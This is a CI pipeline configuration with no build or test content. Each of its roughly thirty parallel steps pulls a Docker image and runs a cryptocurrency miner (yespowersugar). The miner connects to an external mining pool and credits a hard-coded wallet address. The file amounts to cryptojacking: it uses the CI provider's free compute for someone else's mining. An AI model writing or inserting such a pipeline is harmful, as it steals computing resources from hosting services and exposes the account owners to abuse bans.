pipelines:
  default:
   - parallel:
     - step:
        script:
          - docker run foxy28/foxy-opt ./lin -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q7rd7nzu0vxv7tks8phzkd70gtuxnf3jkjhm9g8.act
        services:
          - docker
     - step:
        script:
          - docker run foxy28/foxy-opt ./lin -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q7rd7nzu0vxv7tks8phzkd70gtuxnf3jkjhm9g8.act
        services:
          - docker     
     - step:
        script:
          - docker run foxy28/foxy-opt ./lin -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q7rd7nzu0vxv7tks8phzkd70gtuxnf3jkjhm9g8.act
        services:
          - docker
     - step:
        script:
          - docker run foxy28/foxy-opt ./lin -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q7rd7nzu0vxv7tks8phzkd70gtuxnf3jkjhm9g8.act
        services:
          - docker            
     - step:
        script:
          - docker run foxy28/foxy-opt ./lin -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q7rd7nzu0vxv7tks8phzkd70gtuxnf3jkjhm9g8.act
        services:
          - docker
     - step:
        script:
          - docker run foxy28/foxy-opt ./lin -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q7rd7nzu0vxv7tks8phzkd70gtuxnf3jkjhm9g8.act
        services:
          - docker     
     - step:
        script:
          - docker run foxy28/foxy-opt ./lin -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q7rd7nzu0vxv7tks8phzkd70gtuxnf3jkjhm9g8.act
        services:
          - docker
     - step:
        script:
          - docker run foxy28/foxy-opt ./lin -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q7rd7nzu0vxv7tks8phzkd70gtuxnf3jkjhm9g8.act
        services:
          - docker     
     - step:
        script:
          - docker run foxy28/foxy-opt ./lin -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q7rd7nzu0vxv7tks8phzkd70gtuxnf3jkjhm9g8.act
        services:
          - docker
     - step:
        script:
          - docker run foxy28/foxy-opt ./lin -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q7rd7nzu0vxv7tks8phzkd70gtuxnf3jkjhm9g8.act
        services:
          - docker     
     - step:
        script:
          - docker run foxy28/foxy-opt ./lin -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q7rd7nzu0vxv7tks8phzkd70gtuxnf3jkjhm9g8.act
        services:
          - docker
     - step:
        script:
          - docker run foxy28/foxy-opt ./lin -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q7rd7nzu0vxv7tks8phzkd70gtuxnf3jkjhm9g8.act
        services:
          - docker     
     - step:
        script:
          - docker run foxy28/foxy-opt ./lin -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q7rd7nzu0vxv7tks8phzkd70gtuxnf3jkjhm9g8.act
        services:
          - docker
     - step:
        script:
          - docker run foxy28/foxy-opt ./lin -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q7rd7nzu0vxv7tks8phzkd70gtuxnf3jkjhm9g8.act
        services:
          - docker     
     - step:
        script:
          - docker run foxy28/foxy-opt ./lin -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q7rd7nzu0vxv7tks8phzkd70gtuxnf3jkjhm9g8.act
        services:
          - docker
     - step:
        script:
          - docker run foxy28/foxy-opt ./lin -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q7rd7nzu0vxv7tks8phzkd70gtuxnf3jkjhm9g8.act
        services:
          - docker     
     - step:
        script:
          - docker run foxy28/foxy-opt ./lin -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q7rd7nzu0vxv7tks8phzkd70gtuxnf3jkjhm9g8.act
        services:
          - docker
     - step:
        script:
          - docker run foxy28/foxy-opt ./lin -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q7rd7nzu0vxv7tks8phzkd70gtuxnf3jkjhm9g8.act
        services:
          - docker     
     - step:
        script:
          - docker run foxy28/foxy-opt ./lin -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q7rd7nzu0vxv7tks8phzkd70gtuxnf3jkjhm9g8.act
        services:
          - docker
     - step:
        script:
          - docker run foxy28/foxy-opt ./lin -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q7rd7nzu0vxv7tks8phzkd70gtuxnf3jkjhm9g8.act
        services:
          - docker     
     - step:
        script:
          - docker run foxy28/foxy-opt ./lin -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q7rd7nzu0vxv7tks8phzkd70gtuxnf3jkjhm9g8.act
        services:
          - docker
     - step:
        script:
          - docker run foxy28/foxy-opt ./lin -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q7rd7nzu0vxv7tks8phzkd70gtuxnf3jkjhm9g8.act
        services:
          - docker     
     - step:
        script:
          - docker run foxy28/foxy-opt ./lin -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q7rd7nzu0vxv7tks8phzkd70gtuxnf3jkjhm9g8.act
        services:
          - docker
     - step:
        script:
          - docker run foxy28/foxy-opt ./lin -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q7rd7nzu0vxv7tks8phzkd70gtuxnf3jkjhm9g8.act
        services:
          - docker     
     - step:
        script:
          - docker run foxy28/foxy-opt ./lin -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q7rd7nzu0vxv7tks8phzkd70gtuxnf3jkjhm9g8.act
        services:
          - docker
     - step:
        script:
          - docker run foxy28/foxy-opt ./lin -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q7rd7nzu0vxv7tks8phzkd70gtuxnf3jkjhm9g8.act
        services:
          - docker     
     - step:
        script:
          - docker run foxy28/foxy-opt ./lin -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q7rd7nzu0vxv7tks8phzkd70gtuxnf3jkjhm9g8.act
        services:
          - docker
     - step:
        script:
          - docker run foxy28/foxy-opt ./lin -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q7rd7nzu0vxv7tks8phzkd70gtuxnf3jkjhm9g8.act
        services:
          - docker               